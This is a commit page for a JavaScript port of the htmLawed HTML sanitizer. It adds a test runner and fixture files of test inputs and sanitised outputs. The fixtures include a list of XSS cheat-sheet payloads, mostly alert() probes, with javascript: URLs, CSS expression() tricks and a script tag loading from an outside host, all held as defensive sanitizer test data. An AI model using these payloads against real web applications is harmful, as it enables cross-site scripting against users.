vitalif-js
/
htmlawed
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

add some tests, rename hl_bal function arg

master
Vitaliy Filippov 2016-07-05 16:15:15 +03:00
parent e6d3da4e08
commit a5778a95c3
7 changed files with 1124 additions and 97 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
htmLawed-test.js
View File

@ -1,3 +1,24 @@
const fs = require('fs');
const htmLawed = require('./htmLawed.c.js');
console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
if (out1 == check1)
console.log("[TESTCASE.txt] OK");
else
{
console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
}
var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
var m;
while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
{
var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
if (output === m[4])
console.log("["+m[1]+"] "+m[2]+": OK");
else
console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
tests = tests.substr(m[0].length);
}

18
htmLawed.js
View File

@ -161,8 +161,8 @@ var htmLawed = module.exports =
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
if (C.tidy)
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
return t;
// eof
return t;
},
hl_attrval: function(a, t, p)
{
@ -208,10 +208,10 @@ var htmLawed = module.exports =
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
// eof
},
hl_bal: function(t, perf, intag)
hl_bal: function(t, keep_bad, intag)
{
if (perf === undefined)
perf = 1;
if (keep_bad === undefined)
keep_bad = 1;
// balance tags
// by content
var cont = {};
@ -271,7 +271,7 @@ var htmLawed = module.exports =
// intag sets allowed child
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
if (cont.E[intag])
return (!perf ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
return (!keep_bad ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
var inOk = getCont(intag);
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
var _ob = '';
@ -421,13 +421,13 @@ var htmLawed = module.exports =
delete cont.I['ins'];
}
// bad tags, & ele content
if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
_ob += '&lt;'+s+e+a+'&gt;';
if (x !== '' && x !== null)
{
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
_ob += '<div>'+x+'</div>';
else if (perf < 3 || ok['#pcdata'])
else if (keep_bad < 3 || ok['#pcdata'])
_ob += x;
else if (x.indexOf("\x02\x04") >= 0)
{
@ -435,10 +435,10 @@ var htmLawed = module.exports =
for (var _i = 0; _i < x.length; _i++)
{
var v = x[_i];
_ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
_ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
}
}
else if (perf > 4)
else if (keep_bad > 4)
_ob += x.replace(/\S+/g, '');
}
}

450
htmLawed_TESTCASE_out.htm Normal file
View File

@ -0,0 +1,450 @@
/*
htmLawed_TESTCASE.txt, 27 February 2016
htmLawed 1.1.22, 5 March 2016
Copyright Santosh Patnaik
Dual licensed with LGPL 3 and GPL 2+
A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
*/
This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
************************************************
when viewing this file in a web browser, set the
character encoding to Unicode/UTF-8
************************************************
--------------------- start --------------------
<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
<h6>Attributes</h6>
<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" /><br />
<strong>Required:</strong> <img src="src" alt="image" />, <img alt="image" src="src" /><br />
<strong>Quote &amp; space variation:</strong> <a id="id1" name="xy">a</a>, <a id="id2" name="xy">a</a>, <a id="id3" name="n">a</a><br />
<strong>Invalid:</strong> <a id="id4">a</a><br />
<strong>Duplicated:</strong> <a id="id6">a</a><br />
<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr style="border-style: none; border: 0; background-color: gray; color: gray;" /><br />
<strong>Casing:</strong> <a href=""></a><br />
<strong>Custom:</strong> <img alt="image" src="src" /><br />
<strong>Data-*:</strong> <a>a</a><br />
<strong>Admin-restricted?:</strong> <a href="x"></a>
<h6>Attribute values</h6>
<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a></a><br />
(try 'my_' for prefix)<br />
<strong>Double-quotes in value:</strong><a title="ab"></a>, <a title="ab"></a>, <a title="ab&quot;c"></a><br />
(try filter for CSS expression)<br />
<strong>CSS expression</strong>: <div style="prop: ();"></div><div style="prop: ()"></div><div style="prop: ();"></div><div style="prop : ()"></div><div style="prop: (js);"></div><div style="prop: (js;)"></div><div style="prop: ('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop: ( 'js&#x40; );"></div><br />
<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
<h6>Blockquotes</h6>
<blockquote><div>abc</div></blockquote><br />
<blockquote><div>abc<div>def</div></div></blockquote><br />
<blockquote><div>abc</div><div>def</div></blockquote><br />
<blockquote><div>abc<div>def</div>ghi</div></blockquote><br />
abc<div>def</div>ghi<br />
<blockquote><div>QQQ<div>x</div>&lt;!-- comment --&gt;</div></blockquote><br />
<blockquote><div>x</div><div>&lt;!-- comment --&gt;QQQ</div></blockquote><br />
<blockquote><div>&lt;!-- comment --&gt;<div>x</div>QQQ<div>x</div></div></blockquote><br />
<blockquote><div>x&lt;!-- comment --&gt;</div><div>QQQ</div></blockquote><p>x</p><br />
<br />
(try with blockquote parent)
<h6>CDATA sections</h6>
<strong>Special characters inside:</strong> &lt;![CDATA[ ]]&gt; ]]&gt;, &lt;![CDATA[ 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 ]]&gt;<br />
<strong>Normal:</strong> &lt;![CDATA[ check ]]&gt;, <em>CDATA follows:&lt;![CDATA[ check ]]&gt;</em><br />
<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt;![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
<strong>Invalid:</strong> <em>&gt;CDATA in tag content</em>, <table>&lt;![CDATA[ check ]]&gt;<tr><td>text not allowed</td></tr></table>
<h6>Complex-1: deprecated elements</h6>
<div style="text-align: center;">
The PHP <span style="text-decoration: line-through;">software</span> script used for this <span style="text-decoration: line-through;">web-page</span> webpage is <span style="font-weight: bold; font-size: 200%; color: red; font-family: arial;">htmLawedTest.php</span>, from <span style="color:green; text-decoration: underline;">PHP Labware</span>.
</div>
<h6>Complex-2: deprecated attributes</h6>
<img src="s" alt="a" id="n" /><img src="s" alt="a" id="id9" />
<br style="clear: left;" />
<hr style="border-style: none; border: 0; background-color: gray; color: gray; size: 1px;" />
<img src="s" alt="image" width="10em" height="20" style="padding:5px; float: left; margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px; border: 1px;" id="id10" />
<table width="50em" style="margin: auto; background-color: red;">
<tr>
<td style="width: 20%;">
<div style="margin: auto;">
<h3 style="text-align: right;">Section</h3>
<p style="text-align: right;">Para</p>
<ol style="list-style-type: lower-latin;"><li><a name="x" id="x">First</a> <a name="x" id="id11">item</a></li></ol>
</div>
</td>
<td style="width: auto;">
<ol style="list-style-type: decimal;"><li>First item</li></ol>
</td>
</tr>
</table>
<br style="clear: both;" />
<h6>Complex-3: embed, object, area</h6>
&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;<br />
&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;<br />
&lt;object data="1.gif" type="image/gif" usemap="#map1"&gt;<map name="map1" id="map1">
<p>navigate the site: <a href="1" shape="rect" coords="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
<area href="5" shape="rect" coords="0,0,118,28" alt="area" />
</map>&lt;/object&gt;
&lt;param name="name" /&gt;value&lt;/param&gt;
&lt;object id="obj1"&gt;
&lt;param name="param1" /&gt;
&lt;object id="obj2"&gt;
&lt;param name="param2" /&gt;
&lt;/object&gt;
&lt;/object&gt;
<h6>Complex-4: nested and other tables</h6>
<table border="1" style="background-color: red;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" style="background-color: green;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
<strong>Missing tr:</strong> <table>&lt;td&gt;Well&lt;/td&gt;</table><br />
<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
(Try different 'keep_bad' values)
&lt;*&gt; Pseudotags &lt;*&gt;
&lt;xml&gt;Non-HTML tag xml&lt;/xml&gt;
<p>
Disallowed tag p
</p>
<ul>Bad<li>OK</li></ul>
<h6>Elements</h6>
<strong>Unbalanced:</strong> <a href="h"><em>check</em></a>&lt;/em&gt;<br />
<strong>Non-XHTML:</strong> <div><div style="text-align: center;"><ul></ul></div></div><br />
<strong>Malformed:</strong> &lt; a href=""&gt;&lt;/a&gt;, <a href=""></a>, <a href=""></a>, <a href=""></a>, <a href="">&lt; /a&gt;, &lt; a href=""&gt;</a>, <img src="s" alt="a" />, <img src="s" alt="a" />, &lt;imgsrc="s" alt="a" /&gt;<br />
<strong>Invalid:</strong> &lt;image src="s" alt="a" /&gt;<br />
<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a" />&lt;/img&gt;, <img src="s" alt="a" />text&lt;/img&gt;<br />
<strong>Content invalid:</strong> <a href="h">1</a><a>2</a>&lt;/a&gt;<br />
<strong>Content invalid?:</strong> <form action="action"></form><br /> (try setting 'form' as parent)<br />
<strong>Casing:</strong> <a href=""></a><br />
<strong>Check for tidy:</strong> <br /><hr />&lt;/div&gt;<hr />&lt;/div&gt;<hr />&lt;/div&gt;<div>hi</div>
<h6>Entities</h6>
<strong>Special:</strong> &amp; 3 &lt; 2 &amp; 5&gt;4 and j &gt;i &gt;a &amp; i&lt;j&gt;a<br />
<strong>Padding:</strong> &#66; &#66; &#x66; &#x66; &amp;#x003; &amp;#0003;<br />
<strong>Malformed:</strong> &amp; #x27;, &amp;x27;, &#x27; &amp;TILDE;, &amp;tilde<br />
<strong>Invalid:</strong> &amp;#x3;, &amp;#55296;, &amp;#03;, &amp;#1114112;, &amp;#xffff, &amp;bad;<br />
<strong>Discouraged characters:</strong> &amp;#x7f;, &amp;#132;, &#64992;, &#1114110;<br />
<strong>Context:</strong> '&gt;', &lt;?<br />
<strong>Casing:</strong> &#x27;, &#x27;, &amp;TILDE;, &tilde;
<br />
(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
<h6>Format</h6>
<strong>Valid but ill-formatted:</strong> text &lt;!-- comment --&gt;
text &lt;!--
A c o m m e n t --&gt;
&lt;script&gt;
&lt;![CDATA[
code
]]&gt;
&lt;/script&gt;&lt;!-- comment --&gt;&lt;![CDATA[ cdata ]]&gt; <a>text&lt;/b&gt; text&lt;pre id="none"&gt;p r e&lt;/pre&gt;
<textarea rows="10" cols="50">text</textarea> <textarea rows="10" cols="50">
text text
</textarea> text text <br />&lt;hr /&gt;
text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b>
</a><a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b>
</a>
<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span>
&lt;script&gt;script&lt;/script&gt;
<div>
<pre>p <a>r</a> e &lt;!-- comment --&gt; </pre>
<pre>
pre
</pre>
</div>
<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
(try to compact or beautify)
<h6>Forms</h6>
(note nesting of 'form', missing required attributes, etc.)<br />
<form action="action"><div>
&lt;script type="text/javascript"&gt;s&lt;/script&gt;
<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1" /></fieldset>
<input name="h" type="checkbox" value="h" tabindex="20" /> h
<textarea name="t" rows="10" cols="50">t</textarea>
</div></form><form action="a" method="get"></form>&lt;/form&gt;<br />
<form action="b" method="get"><p><input type="text" value="i" /></p></form><br />
<form action="action"><div>B:<input type="text" value="b" />C:<input type="text" value="c" /></div></form><br />
(try each of these lines separately)<br />
<form action="a"><div>what<br />
</div></form><form action="a"><div>what
(try with container as div and as form)<br />
</div></form><form action="action"><div>c <a>a</a> <b>b</b><input />&lt;script&gt;s&lt;/script&gt;
<h6>HTML comments (also CDATA)</h6>
<strong>Script inside:</strong> &lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;<br />
<strong>Special characters inside: &lt;!-- &lt;![CDATA check ]]&gt; --&gt;, &lt;!-- 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 --&gt;, &lt;!-- che--ck --&gt;, &lt;!--[if !IE]&gt; &lt;--&gt;<a>c</a>&lt;!--&gt; &lt;![endif]--&gt;<br />
<strong>Normal:</strong> &lt;!-- check --&gt;, &lt;!--check --&gt;, <em>comment:&lt;!-- check --&gt;</em>&lt;!-- check --&gt;, &lt;table&gt;&lt;!-- check --&gt;&lt;tr&gt;&lt;td&gt;text not allowed&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br />
<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
Invalid:</strong> <em>&gt;comment in tag content</em>, &lt;!--check--&gt;
<h6>HTML5</h6>
<strong>figure and figcaption:</strong> &lt;figure&gt;<img src="picture.jpg" alt="picture" />&lt;figcaption&gt;Caption for the awesome picture&lt;/figcaption&gt;&lt;/figure&gt;
<strong>article:</strong> <h1>A</h1><p>B</p>&lt;article&gt;<h2>C</h2>&lt;/article&gt;&lt;article&gt;<h2>E</h2><p>F</p><p>G</p>&lt;/article&gt;
<strong>meter</strong>: <p>Heat &lt;meter min="100" max="200" value="150"&gt;150&lt;/meter&gt;.</p>
<strong>datalist</strong>: <input />&lt;datalist id="b"&gt;&lt;option value="c"&gt;&lt;option value="d"&gt;&lt;/datalist&gt;
<h6>Ins-Del</h6>
(depending on context, these elements can be of either block or inline type)<br />
<p><ins datetime="d" cite="c">&lt;div&gt;block</ins></p></div>&lt;/ins&gt;&lt;/p&gt;<div><br />
<p><del>d</del></p><br />
<p><ins><del>d</del></ins></p><div><ins><p><del>&lt;div&gt;d</del></p></ins></div>&lt;/del&gt;&lt;/p&gt;&lt;/ins&gt;</div><ins><div>d</div></ins>
<h6>Lists</h6>
<div><strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
<strong>Definition lists, nested</strong>: <dl>
<dt>T1</dt>
<dd>D1</dd>
<dt>T2</dt>
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
<dt>T3</dt>
<dd>D3</dd>
<dt>T4</dt>
<dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
</dl><br />
<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
<dt>T1
</dt><dd>D1</dd>
<dt>T2</dt>
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
<dt>T3
</dt><dd>D3
</dd><dt>T4
</dt><dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
</dl><br />
<strong>Nested</strong>: <ul>
<li>l1</li>
<li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
<li>l3</li>
<li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
</ul><br />
<strong>Nested, directly</strong>: <ul>
<li>l1</li>
&lt;ol&gt;l2&lt;/ol&gt;
<li>l3</li>
</ul><br />
<strong>Nested, close-tags omitted</strong>: <ul>
<li>l1</li>
<li>l2<ol><li>lo1</li><li>lo2</li></ol>
</li><li>l3
</li><li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol>
</li></ul><br />
<strong>Complex</strong>:
<ol>&lt;script&gt;&lt;/script&gt;<li><table><tr><td>
<ul><li id="search" class="widget widget_search"> </li></ul></td></tr></table></li></ol></div></form><form id="searchform" method="get" action="http://kohei.us">
<div>
<input type="text" name="s" id="s" size="15" /><br />
<input type="submit" value="Search" />
</div>
</form>
&lt;/li&gt;&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/li&gt;&lt;/ol&gt;
<strong>Menu</strong>: <ul style="list-style-type: decimal;"><li><ul>
&lt;button type="button"&gt;New...&lt;/button&gt;
</ul></li><li><ul>&lt;button type="button"&gt;Cut...&lt;/button&gt;</ul></li>
</ul>
<h6>Microdata</h6>
<div>
I am <span>X</span> but people call me <span>Y</span>.
Find me at <a href="http://www.xy.com">www.xy.com</a>
</div>
<h6>Microsoft Word</h6>
<strong>Proprietary tag</strong>: <p class="3DMsoNormal">&lt;o:p&gt;&nbsp;&lt;/o:p&gt;</p><br />
<strong>XML declaration</strong>: &lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt;<br />
<strong>XML-invalid character code-point (may not replicate)</strong>: <p class="3DMsoNormal">“Where is he?” asked both Mary the one so lovely and Jane.</p>
<h6>Nesting</h6>
<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link">&lt;div&gt;hi&lt;/div&gt;</a><br />
<h6>Non-English text-1</h6>
Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
večjezično računalništvo<br />
<a title="อ.อ่าง">อ.อ่าง</a><br />
<a title="הירשמו כעת לכנס">Зарегистрируйтесь сейчас
на Десятую Международную Конференцию по</a><br />
(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
<h6>Non-English text-2: entities</h6>
&#29992;&#32479;&#19968;&#30721;<br />
&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br />
Inscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz
na Alemanha.
<h6>Ruby</h6>
(need compatible browser)<br />
<ruby xml:lang="ja">
<rbc>
<rb></rb>
<rb></rb>
<rb></rb>
<rb></rb>
</rbc>
<rtc class="reading">
<rt>さい</rt>
<rt>とう</rt>
<rt>のぶ</rt>
<rt></rt>
</rtc>
<rtc class="annotation">
<rt xml:lang="en">W3C Associate Chairman</rt>
</rtc>
</ruby><br />
<ruby>
<rb>WWW</rb>
<rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
</ruby><br />
<ruby>
A
<rp>(</rp><rt>aaa</rt><rp>)</rp>
</ruby>
<h6>Tables</h6>
<strong>Omitted closing tags:</strong> <table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table><br />
<strong>Nested, omitted closing tags:</strong> <table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2<table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table>
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table><br />
<h6>Tag transformation</h6>
<strong>Font element intended as 'inline' element:</strong> <p><span style="color: red;">hi</span></p><br />
<strong>Font element intended as 'block' element:</strong> <div><span style="color: red;">&lt;div&gt;hi</span></div>&lt;/span&gt;&lt;/div&gt;<br />
<strong>Font element intended as 'block' element:</strong> <div style="text-align: center;"><span style="color: red; font-family: serif, 'Times';">&lt;div&gt;hi</span></div><div>QQQ</div>&lt;/span&gt;&lt;/div&gt;<br />
<h6>Tidy</h6>
<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi
<h6>URLs</h6>
<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
(try base URL value of 'http://a.com/b/')<br />
<strong>CSS URLs:</strong> <div style="background-image: url('denied:a.gif');"></div>, <div style="background-image: URL(&quot;denied:a.gif&quot;);"></div>, <div style="background-image: url('denied:http://a.com/a.gif');"></div>, <div style="background-image: url('denied:./../a.gif');"></div>, <div style="background-image: url('denied:js:xss')"></div><br />
<strong>Double URLs:</strong> <a style="behaviour: url(denied:foo) url(denied:http://example.com/xss.htc)">b</a><br />
<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, </a><a href="denied:http://c.com/d.f"></a><br />
<strong>Soft-hyphen:</strong> <a href="http://q=ídis c">ídis­c</a>
<h6>XSS</h6>
<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
'';!--"&lt;xss&gt;=&amp;{()}<br />
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('xss');" alt="image" /><br />
<img src="denied:java script:alert('xss');" alt="image" /><br />
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
&lt;div style="javascript:alert('xss');"&gt;&lt;/div&gt;<br />
&lt;div style="background-image:url(denied:javascript:alert('xss'));"&gt;&lt;/div&gt;<br />
&lt;div style="background-image:url(&quot;denied:javascript:alert('xss')&quot; );"&gt;&lt;/div&gt;<br />
&lt;!--[if gte IE 4]&gt;&lt;script&gt;alert('xss');&lt;/script&gt;&lt;![endif]--&gt;<br />
&lt;script a="&gt;" src="http://ha.ckers.org/xss.js"&gt;&lt;/script&gt;<br />
&lt;div style="background-image: url('denied:js:xss')"&gt;&lt;/div&gt;<br />
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/ /pression(alert(&quot;XSS&quot;))">x</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
&lt;h6&gt;Other&lt;/h6&gt;
3 &lt; 4 <br />
3 &gt; 4 <br />
&gt; 3 <br />
&lt;._.&gt; hi! <br />
&lt;&lt;&lt; ALERT &gt;&gt;&gt; <br />
&lt;![if !vml]&gt; some stuff &lt;![endif]&gt; <br />
&lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt; <br />
&lt;uml:ns ns = "urn:www"&gt; <br />
&lt;uml:ns ns = 'urn:www'&gt; <br />
if(13&lt;age AND 21&gt;age){say 'teen'} <br />
age &gt;51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
age &gt; 51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
age &lt;51 and a smoking history of &lt;51 pack-years &lt;b&gt;was&lt;/b&gt; <br />
age &lt; 51 and a smoking history of &lt; 51 pack-years <b>was</b> <br />
<b>age &gt;51 and a smoking history of &gt;51 pack-years</b> <br />
<b>age &gt; 51 and a smoking history of &gt;51 pack-years</b> <br />
<b>age &lt;51 and a smoking history of &lt;51 pack-years&lt;/b&gt; <br />
<b>age &lt; 51 and a smoking history of &lt; 51 pack-years</b> <br />
</b></span>

642
rsnake_xss.txt Normal file
View File

@ -0,0 +1,642 @@
1. XSS Locator
Input code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
2. XSS Quick Test
Input code »
'';!--"<XSS>=&{()}
Output code »
'';!--"&lt;XSS&gt;=&amp;{()}
3. SCRIPT w/Alert()
Input code »
<SCRIPT>alert('XSS')</SCRIPT>
Output code »
